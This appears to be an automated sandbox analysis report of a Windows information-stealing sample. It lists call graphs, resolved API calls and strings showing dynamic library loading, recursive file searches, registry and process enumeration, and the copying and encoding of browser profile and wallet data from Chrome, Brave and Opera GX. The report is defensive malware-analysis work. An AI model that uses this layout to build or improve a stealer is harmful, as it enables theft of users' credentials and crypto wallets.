GetProcessHeap HeapFree 73488->73570 73489 410490 GetLastError 73491 410534 73489->73491 73489->73492 73493 41053e 73491->73493 73571 4112d0 GetProcessHeap HeapFree 73491->73571 73492->73489 73500 4104a3 73492->73500 73493->73025 73494 4104fb 73498 410505 wsprintfA 73494->73498 73499 41054d 73494->73499 73498->73025 73499->73025 73501 410528 73500->73501 73502 4104be GetLogicalProcessorInformationEx 73500->73502 73568 4112d0 GetProcessHeap HeapFree 73500->73568 73569 4112f0 GetProcessHeap HeapAlloc 73500->73569 73501->73025 73502->73488 73502->73489 73503->73039 73572 411280 73504->73572 73507 4105a0 wsprintfA 73507->73053 73510 40fd00 lstrcpy 73509->73510 73511 410608 EnumDisplayDevicesA 73510->73511 73512 4106c2 73511->73512 73515 410635 73511->73515 73512->73072 73513 40fec0 lstrlenA lstrcpy lstrcat 73513->73515 73514 40fde0 lstrcpy 73514->73515 73515->73513 73515->73514 73516 41069d EnumDisplayDevicesA 73515->73516 73516->73512 73516->73515 73518 40fd00 lstrcpy 73517->73518 73519 4109b8 CreateToolhelp32Snapshot Process32First 73518->73519 73520 4109e9 Process32Next 73519->73520 73521 410a68 CloseHandle 73519->73521 73520->73521 73524 4109fb 73520->73524 73521->73085 73522 40fec0 lstrlenA lstrcpy lstrcat 73522->73524 73523 40fde0 lstrcpy 73523->73524 73524->73522 73524->73523 73525 410a56 Process32Next 73524->73525 73525->73521 73525->73524 73527 40fd00 lstrcpy 73526->73527 73528 410712 RegOpenKeyExA 73527->73528 73529 410749 73528->73529 73541 410778 73528->73541 73530 40fd40 lstrcpy 73529->73530 73532 410757 73530->73532 73531 410780 RegEnumKeyExA 73533 4107ae wsprintfA RegOpenKeyExA 73531->73533 73531->73541 73532->73099 73534 410921 73533->73534 73535 4107f3 RegQueryValueExA 73533->73535 73537 40fd40 lstrcpy 73534->73537 73536 410823 lstrlenA 73535->73536 73535->73541 73536->73541 73538 410939 73537->73538 73538->73099 73539 40fec0 lstrlenA lstrcpy lstrcat 73539->73541 73540 41088c RegQueryValueExA 73540->73541 73541->73531 73541->73534 73541->73539 73541->73540 73542 40fde0 lstrcpy 73541->73542 73542->73541 73544 4152e2 73543->73544 73545 40fde0 lstrcpy 73544->73545 73546 41532d 73545->73546 73547 40fde0 lstrcpy 73546->73547 73548 41534b 73547->73548 73549 40fde0 lstrcpy 73548->73549 73550 415357 73549->73550 73551 40fde0 lstrcpy 73550->73551 73552 415363 73551->73552 73553 415383 CreateThread WaitForSingleObject 73552->73553 73554 41536b 73552->73554 73556 40fd00 lstrcpy 73553->73556 73574 413ce0 73553->73574 73555 415370 Sleep 73554->73555 73555->73553 73555->73555 73557 4153b7 73556->73557 73557->73121 73559 4100c5 RegQueryValueExA 73558->73559 73560 4100db 73558->73560 73559->73560 73560->73431 73562 410e77 SysAllocString 73561->73562 73563 410ede 73561->73563 73562->73563 73565 410e88 73562->73565 73563->73447 73564 410eda SysFreeString 73564->73563 73565->73564 73566 410ebe _wtoi64 SysFreeString 73565->73566 73566->73564 73567->73461 73568->73500 73569->73500 73570->73494 73571->73493 73573 41058a GlobalMemoryStatusEx 73572->73573 73573->73507 73583 40ffa0 73574->73583 73576 413d0f lstrlenA 73577 413d1f 73576->73577 73579 413d2a 73576->73579 73578 40fd40 lstrcpy 73578->73579 73579->73578 73581 40fde0 lstrcpy 73579->73581 73582 413dd9 StrCmpCA 73579->73582 73584 404d60 73579->73584 73581->73579 73582->73577 73582->73579 73583->73576 73585 40fd40 lstrcpy 73584->73585 73586 404d9e 73585->73586 73587 404350 5 API calls 73586->73587 73588 404daa 73587->73588 73788 411600 73588->73788 73590 404dda 73591 404de5 lstrlenA 73590->73591 73592 404df5 73591->73592 73593 411600 4 API calls 73592->73593 73594 404e03 73593->73594 73595 40fd00 lstrcpy 73594->73595 73596 404e13 73595->73596 73597 40fd00 lstrcpy 73596->73597 73598 404e24 73597->73598 73599 40fd00 lstrcpy 73598->73599 73600 404e35 73599->73600 73601 40fd00 lstrcpy 73600->73601 73602 404e46 73601->73602 73603 40fd00 lstrcpy 73602->73603 73604 404e57 StrCmpCA 73603->73604 73605 404e7b 73604->73605 73606 411330 2 API calls 73605->73606 73614 4056ba 73605->73614 73607 404e98 73606->73607 73608 40fe30 2 API calls 73607->73608 73609 404eaf 73608->73609 73610 40fde0 lstrcpy 73609->73610 73611 404ebc 73610->73611 73612 40fec0 3 API calls 73611->73612 73613 404ee7 73612->73613 73615 40fe30 2 API calls 73613->73615 73616 40fd40 lstrcpy 73614->73616 73617 404efd 73615->73617 73627 40561a 73616->73627 73618 40fec0 3 API calls 73617->73618 73619 404f11 73618->73619 73620 40fde0 lstrcpy 73619->73620 73621 404f1e 73620->73621 73622 40fec0 3 API calls 73621->73622 73623 404f57 73622->73623 73624 40fe30 2 API calls 73623->73624 73625 404f6a 73624->73625 73627->73579 73789 411613 CryptBinaryToStringA 73788->73789 73790 41160c 73788->73790 73791 411649 73789->73791 73792 41162e GetProcessHeap RtlAllocateHeap 73789->73792 73790->73590 73791->73590 73792->73791 73793 411651 CryptBinaryToStringA 73792->73793 73793->73590 73802->73128 73804 406c8c 73803->73804 74119 406b50 73804->74119 73806 406c9f 73806->73177 73808 40fd00 lstrcpy 73807->73808 73809 40ded1 73808->73809 74172 411550 SHGetFolderPathA 73809->74172 73812 40fe30 2 API calls 73813 40defd 73812->73813 73814 40fde0 lstrcpy 73813->73814 73815 40df0a 73814->73815 73816 40fe30 2 API calls 73815->73816 73817 40df31 73816->73817 73818 40fde0 lstrcpy 73817->73818 73819 40df3e 73818->73819 73820 40fd00 lstrcpy 73819->73820 73860 40fd00 lstrcpy 73859->73860 73861 40e201 73860->73861 73862 40fd00 lstrcpy 73861->73862 73863 40e212 73862->73863 73864 40e22c StrCmpCA 73863->73864 73865 40e4e6 73864->73865 73866 40e23d 73864->73866 73868 411550 2 API calls 73865->73868 73867 411550 2 API calls 73866->73867 73869 40e246 73867->73869 73870 40e4ef 73868->73870 73871 40fe30 2 API calls 73869->73871 73872 40fe30 2 API calls 73870->73872 73873 40e25a 73871->73873 73874 40e503 73872->73874 73875 40fde0 lstrcpy 73873->73875 73876 40fde0 lstrcpy 73874->73876 73878 40e267 73875->73878 73877 40e510 73876->73877 73880 40fe30 2 API calls 73877->73880 73879 40fe30 2 API calls 73878->73879 73881 40e28e 73879->73881 73882 40e537 73880->73882 73973 40fd00 lstrcpy 73972->73973 73974 40ba70 73973->73974 73975 40fd00 lstrcpy 73974->73975 73976 40ba81 73975->73976 73977 411550 2 API calls 73976->73977 73978 40ba91 73977->73978 73979 40fe30 2 API calls 73978->73979 73980 40baa5 73979->73980 73981 40fde0 lstrcpy 73980->73981 73982 40bab2 73981->73982 73983 40fe30 2 API calls 73982->73983 73984 40bad9 73983->73984 73985 40fde0 lstrcpy 73984->73985 73986 40bae6 73985->73986 73987 40fe30 2 API calls 73986->73987 74020 40c3d0 RegGetValueA 74019->74020 74028 40c3b8 74019->74028 74021 40c3f8 RegOpenKeyExA 74020->74021 74023 40c449 RegEnumKeyExA 74021->74023 74030 40c431 74021->74030 74024 40c490 GetProcessHeap HeapAlloc 74023->74024 74023->74030 74025 40c4b3 lstrcat lstrcat RegGetValueA lstrcat RegGetValueA 74024->74025 74026 40c560 lstrcat 74025->74026 74027 40c4b0 74025->74027 74029 40c56f 8 API calls 74026->74029 74027->74025 74027->74029 74032 40c654 lstrcat lstrcat RegEnumKeyExA memset memset 74027->74032 74036 40c548 lstrcat 74027->74036 74038 40c63e lstrcat 74027->74038 74830 411a70 lstrcpy wsprintfA 74027->74830 74831 40bdd0 81 API calls 74027->74831 74028->73157 74029->74027 74029->74032 74030->74028 74032->74027 74034 40c6c4 lstrlenA 74032->74034 74036->74027 74038->74027 74122 4069c0 74119->74122 74121 406b78 74121->73806 74123 4069d3 74122->74123 74124 4069db 74122->74124 74123->74121 74139 406480 74124->74139 74126 4069fb 74136 406a83 74126->74136 74145 406550 74126->74145 74128 406a0e 74128->74136 74152 406770 74128->74152 74130 406a49 74130->74136 74162 406900 74130->74162 74132 406a96 74132->74136 74168 4112d0 GetProcessHeap HeapFree 74132->74168 74133 406a56 74133->74132 74134 406ad5 FreeLibrary 74133->74134 74135 406ae8 74133->74135 74133->74136 74134->74134 74134->74135 74167 4112d0 GetProcessHeap HeapFree 74135->74167 74136->74121 74141 40648c 74139->74141 74140 406493 74140->74126 74141->74140 74142 4064ed 74141->74142 74169 4112f0 GetProcessHeap HeapAlloc 74142->74169 74144 406502 74144->74126 74146 40659f VirtualAlloc 74145->74146 74151 40656f 74145->74151 74147 4065f7 74146->74147 74148 4065c8 74146->74148 74147->74128 74149 4065d9 VirtualAlloc 74148->74149 74150 4065ce 74148->74150 74149->74147 74150->74128 74151->74146 74153 40678b 74152->74153 74154 4067ac 74152->74154 74153->74154 74155 4067b5 LoadLibraryA 74153->74155 74154->74130 74156 4068e1 74155->74156 74160 4067b2 74155->74160 74156->74130 74158 406896 GetProcAddress 74158->74156 74158->74160 74159 4068c5 74159->74130 74160->74155 74160->74158 74160->74159 74170 4112f0 GetProcessHeap HeapAlloc 74160->74170 74171 4112d0 GetProcessHeap HeapFree 74160->74171 74163 40698b 74162->74163 74164 406916 74162->74164 74163->74133 74164->74163 74165 40695f VirtualProtect 74164->74165 74165->74164 74166 406993 74165->74166 74166->74133 74167->74132 74168->74136 74169->74144 74170->74160 74171->74160 74173 40fd00 lstrcpy 74172->74173 74174 40dee8 74173->74174 74174->73812 74830->74027 74831->74027

                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                            Function 00418460 Relevance: 63.2, APIs: 34, Strings: 2, Instructions: 208libraryloaderCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 551 418460-418472 LoadLibraryA 552 418687-4186e6 LoadLibraryA * 5 551->552 553 418478-418682 GetProcAddress * 21 551->553 554 4186e8-4186f6 GetProcAddress 552->554 555 4186fb-418702 552->555 553->552 554->555 557 418704-41872a GetProcAddress * 2 555->557 558 41872f-418736 555->558 557->558 559 418738-418746 GetProcAddress 558->559 560 41874b-418752 558->560 559->560 561 418754-418762 GetProcAddress 560->561 562 418767-41876e 560->562 561->562 563 418770-418795 GetProcAddress * 2 562->563 564 41879a 562->564 563->564
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00418370), ref: 00418465
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00CAF390), ref: 00418480
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CAF1B0), ref: 004184AD
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CAF210), ref: 004184C6
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CAF2E8), ref: 004184DE
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CAF4E0), ref: 004184F6
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CB2F10), ref: 0041850F
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CB2A40), ref: 00418527
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CB2C60), ref: 0041853F
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CAF498), ref: 00418558
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CAF4F8), ref: 00418570
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CAF4C8), ref: 00418588
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CAF510), ref: 004185A1
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CB2A60), ref: 004185B9
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CAF528), ref: 004185D1
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CAF4B0), ref: 004185EA
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CB2AC0), ref: 00418602
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CAF540), ref: 0041861A
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CAF480), ref: 00418633
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CB2AA0), ref: 0041864B
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CACB18), ref: 00418663
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CB2C80), ref: 0041867C
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CBD930), ref: 0041868D
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CBD9F0), ref: 0041869F
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CBDA50), ref: 004186B1
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CBD960), ref: 004186C2
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CBD900), ref: 004186D4
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75A70000,00CBD8A0), ref: 004186F0
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75290000,00CBDAB0), ref: 0041870C
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75290000,00CBD918), ref: 00418724
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75BD0000,00CBDB70), ref: 00418740
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75450000,00CB2CC0), ref: 0041875C
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(76E90000,00CB2DC0), ref: 00418778
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 0041878F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                            • String ID: NtQueryInformationProcess$kernel32.dll
                                                                                                                                                                                                            • API String ID: 2238633743-258108907
                                                                                                                                                                                                            • Opcode ID: 674a5d5d7bdfe3b15cf9f5f0ddbdd50571bedb9e90fbad599d80228331ceaa6d
                                                                                                                                                                                                            • Instruction ID: 4c9a75b0f2effc14e4ef035a4ebbe2e79da5c4c43e5452636d71d6eae6be30f3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 674a5d5d7bdfe3b15cf9f5f0ddbdd50571bedb9e90fbad599d80228331ceaa6d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B39143BDA00620EFE754DFA4ED58E2637BBF74AB01B106529EA05C7370E774A841CB64
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00416370 Relevance: 49.3, APIs: 23, Strings: 5, Instructions: 322stringfileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1369 416370-4163f6 call 4193a0 wsprintfA FindFirstFileA memset * 2 1372 416410-416416 1369->1372 1373 4163f8-41640b call 40fd80 1369->1373 1375 416420-416434 StrCmpCA 1372->1375 1379 41676d-416794 call 40fd80 * 2 1373->1379 1377 416737-41674a FindNextFileA 1375->1377 1378 41643a-41644e StrCmpCA 1375->1378 1377->1375 1381 416750-416769 FindClose call 40fd80 1377->1381 1378->1377 1380 416454-416485 wsprintfA StrCmpCA 1378->1380 1383 4164b0-4164cd wsprintfA 1380->1383 1384 416487-4164ae wsprintfA 1380->1384 1381->1379 1387 4164d0-416510 memset lstrcat strtok_s 1383->1387 1384->1387 1390 416512-416523 1387->1390 1391 41653f-41657c memset lstrcat strtok_s 1387->1391 1393 4166d1-4166d9 1390->1393 1399 416529-41653d strtok_s 1390->1399 1391->1393 1394 416582-416592 PathMatchSpecA 1391->1394 1393->1377 1396 4166db-4166e9 1393->1396 1397 416624-416638 strtok_s 1394->1397 1398 416598-416622 call 411330 wsprintfA call 40fd80 call 4117b0 call 419540 1394->1398 1396->1381 1401 4166eb-4166f3 1396->1401 1397->1394 1400 41663e 1397->1400 1398->1397 1417 416643-41664e 1398->1417 1399->1390 1399->1391 1400->1393 1401->1377 1403 4166f5-41672c call 401060 call 416370 1401->1403 1410 416731 1403->1410 1410->1377 1418 416795-4167a8 call 40fd80 1417->1418 1419 416654-41667a call 40fd00 call 406d60 1417->1419 1418->1379 1426 4166c4-4166ca 1419->1426 1427 41667c-4166bf call 40fd00 call 401060 call 4152b0 call 40fd80 1419->1427 1426->1393 1427->1426
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$strtok_swsprintf$lstrcat$FileFindFirstMatchPathSpec
                                                                                                                                                                                                            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                                                                            • API String ID: 1425701045-3225784412
                                                                                                                                                                                                            • Opcode ID: 75e946977d0fc4a16568379e8c510530124d5f1fd8a79c07567be36d99771b71
                                                                                                                                                                                                            • Instruction ID: 12f42e42b75de4f13967d3fa557f7841a92df3f38c0c947d1ab3e90f6382c67b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75e946977d0fc4a16568379e8c510530124d5f1fd8a79c07567be36d99771b71
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56C1DEB1900218ABDB10EFA4DD85EEE77B8EF48704F50859EF50593281D7789E88CBA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0040D200 Relevance: 46.4, APIs: 18, Strings: 8, Instructions: 907fileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1435 40d200-40d2c2 call 40fd00 call 40fe30 call 40fec0 call 40fde0 call 40fd80 * 2 call 40fd00 * 2 call 40ffa0 FindFirstFileA 1454 40d2c4-40d2f8 call 40fd80 * 4 1435->1454 1455 40d2fd-40d309 1435->1455 1479 40de4a-40de95 call 40fd80 * 5 1454->1479 1456 40d310-40d324 StrCmpCA 1455->1456 1458 40ddf9-40de09 FindNextFileA 1456->1458 1459 40d32a-40d33e StrCmpCA 1456->1459 1458->1456 1463 40de0f-40de46 FindClose call 40fd80 * 4 1458->1463 1459->1458 1461 40d344-40d3d0 call 40fd90 call 40fe30 call 40fec0 * 2 call 40fde0 call 40fd80 * 3 1459->1461 1504 40d536-40d5cd call 40fec0 * 4 call 40fde0 call 40fd80 * 3 1461->1504 1505 40d3d6-40d3ec call 40ffa0 StrCmpCA 1461->1505 1463->1479 1554 40d5d3-40d5f2 call 40fd80 call 40ffa0 StrCmpCA 1504->1554 1510 40d3f2-40d48f call 40fec0 * 4 call 40fde0 call 40fd80 * 3 1505->1510 1511 40d494-40d531 call 40fec0 * 4 call 40fde0 call 40fd80 * 3 1505->1511 1510->1554 1511->1554 1563 40d7c8-40d7de StrCmpCA 1554->1563 1564 40d5f8-40d60c StrCmpCA 1554->1564 1566 40d7e0-40d83c call 401060 call 40fd40 * 3 call 40cdf0 1563->1566 1567 40d84c-40d861 StrCmpCA 1563->1567 1564->1563 1565 40d612-40d743 call 40fd00 call 411330 call 40fec0 call 40fe30 call 40fde0 call 40fd80 * 3 call 40ffa0 * 2 call 40fd00 call 40fec0 * 2 call 40fde0 call 40fd80 * 2 call 40fd40 call 406d60 1564->1565 1749 40d791-40d7c3 call 40ffa0 call 40ff50 call 40ffa0 call 40fd80 * 2 1565->1749 1750 40d745-40d78c call 40fd40 call 401060 call 4152b0 call 40fd80 1565->1750 1624 40d841-40d847 1566->1624 1569 40d863-40d87b call 40ffa0 StrCmpCA 1567->1569 1570 40d8d8-40d8f3 call 40fd40 call 4114f0 1567->1570 1583 40d881-40d885 1569->1583 1584 40dd6b-40dd72 1569->1584 1594 40d8f5-40d8f9 1570->1594 1595 40d96f-40d984 StrCmpCA 1570->1595 1583->1584 1590 40d88b-40d8d6 call 401060 call 40fd40 * 2 1583->1590 1588 40dd74-40dddb call 40fd40 * 2 call 40fd00 call 401060 call 40d200 1584->1588 1589 40dde6-40ddf6 call 40ff50 * 2 1584->1589 1656 40dde0 1588->1656 1589->1458 1637 40d94d-40d95f call 40fd40 call 407320 1590->1637 1594->1584 1604 40d8ff-40d94a call 401060 call 40fd40 call 40fd00 1594->1604 1600 40d98a-40da3b call 40fd00 call 40fec0 call 40fde0 call 40fd80 call 411330 call 40fe30 call 40fde0 call 40fd80 * 2 call 40ffa0 * 2 CopyFileA 1595->1600 1601 40dbac-40dbc1 StrCmpCA 1595->1601 1700 40da41-40db0b call 401060 call 40fd40 * 3 call 407ab0 call 401060 call 40fd40 * 3 call 408610 1600->1700 1701 40db0d 1600->1701 1601->1584 1610 40dbc7-40dc78 call 40fd00 call 40fec0 call 40fde0 call 40fd80 call 411330 call 40fe30 call 40fde0 call 40fd80 * 2 call 40ffa0 * 2 CopyFileA 1601->1610 1604->1637 1704 40dd48-40dd5a call 40ffa0 DeleteFileA call 40ff50 1610->1704 1705 40dc7e-40dcdb call 401060 call 40fd40 * 3 call 407ea0 1610->1705 1624->1584 1660 40d964-40d96a 1637->1660 1656->1589 1660->1584 1707 40db13-40db29 call 40ffa0 StrCmpCA 1700->1707 1701->1707 1728 40dd5f 1704->1728 1759 40dce0-40dd42 call 401060 call 40fd40 * 3 call 408210 1705->1759 1722 40db2b-40db87 call 401060 call 40fd40 * 3 call 408ca0 1707->1722 1723 40db8d-40db9f call 40ffa0 DeleteFileA call 40ff50 1707->1723 1722->1723 1744 40dba4-40dba7 1723->1744 1734 40dd62-40dd66 call 40fd80 1728->1734 1734->1584 1744->1734 1749->1563 1750->1749 1759->1704
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcpy.KERNEL32(00000000), ref: 0040FE93
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcat.KERNEL32(?,00000000), ref: 0040FE9F
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,004268D2,004268CF,00000000,?,00426A10,?,?,004268CE,?,00000000,00000005), ref: 0040D2B4
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00426A14), ref: 0040D31C
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00426A18), ref: 0040D336
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00426A1C,?,?,004268D3), ref: 0040D3E4
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                            • String ID: Brave$E$Google Chrome$Opera GX$Preferences$P@$P@E$\BraveWallet\Preferences
                                                                                                                                                                                                            • API String ID: 2567437900-2661835735
                                                                                                                                                                                                            • Opcode ID: ea36f979fa23655f1fd5d804a067a1624586dc783084986a9127da92bdc6040e
                                                                                                                                                                                                            • Instruction ID: 25236dbe1d65cefae93bb0319296957f8d262425f002151ff119f50e668ab3c6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea36f979fa23655f1fd5d804a067a1624586dc783084986a9127da92bdc6040e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 89826470900248EADB15EBA5D959BDD7BB86F19304F5080BEF945732C2DB781B0CCBA6
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00404420 Relevance: 37.3, APIs: 13, Strings: 8, Instructions: 537networkfilestringCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
